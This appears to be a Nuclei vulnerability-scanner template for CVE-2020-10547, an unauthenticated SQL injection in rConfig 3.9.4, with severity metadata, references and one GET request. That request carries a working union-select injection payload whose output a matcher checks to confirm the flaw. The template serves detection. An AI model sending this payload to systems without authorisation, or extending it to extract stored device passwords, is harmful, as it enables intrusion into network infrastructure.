id: CVE-2020-10547 info: name: rConfig 3.9.4 - SQL Injection author: madrobot severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10547 cwe-id: CWE-89,CWE-522 tags: cve,cve2020,rconfig,sqli requests: - method: GET path: - "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[project-discovery]" part: body # Enhanced by mp on 2022/04/07